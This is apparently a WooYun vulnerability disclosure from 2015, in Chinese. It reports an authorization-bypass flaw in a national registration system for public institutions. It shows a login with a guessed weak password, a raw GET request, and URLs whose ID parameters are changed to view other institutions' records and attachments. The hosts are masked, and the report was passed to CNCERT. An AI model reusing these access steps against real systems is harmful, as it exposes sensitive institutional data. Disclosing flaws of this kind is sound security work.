当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163916

漏洞标题:国家某登记系统越权可查全国事业单位敏感信息

相关厂商:国家事业单位登记管理局

漏洞作者: Vern

提交时间:2015-12-24 17:09

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

国家某登记系统越权可查全国事业单位敏感信息

详细说明:

国家事业单位登记管理局 登记系统越权查看其它单位登记信息 登记文件 各种敏感信息

000.png


http://**.**.**.**/sldj/201304/t20130415_1420.html


搜狗截图20151223164056.png


http://**.**.**.**/jsp/login/relogin.jsp


http://**.**.**.**/jsp/login/relogin.jsp


没有注册 随便爆破一个用户登入 用户名zhangmin 密码123456
越权1

111.png


GET /jsp/project/set-register/refer.jsp?applyId=&id=105399596 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.8 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=7070487FBE6354EFCBF5A4424834454C.tomcat1; CNZZDATA1000305128=89570420-1450856626-http%253A%252F%252F**.**.**.**%252F%7C1450856626


666.png


越权2:

222.png


http://**.**.**.**/jsp/project/set-register/refer1.jsp?applyId=101250471&realId=105399596&frId=100414603&sydwId=101416951


越权3:

333.png


444.png


555.png


http://**.**.**.**/jsp/ShowInfoImg.jsp?attachmentId=108771147&applyId=101250472


越权4:

999.png


http://**.**.**.**/jsp/ShowInfoImg.jsp?attachmentId=108770094&applyId=


搜狗截图20151223170008.png

漏洞证明:

666.png


999.png


555.png


修复方案:

鉴权很重要

版权声明:转载请注明来源 Vern@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-28 19:08

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家中心上报,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价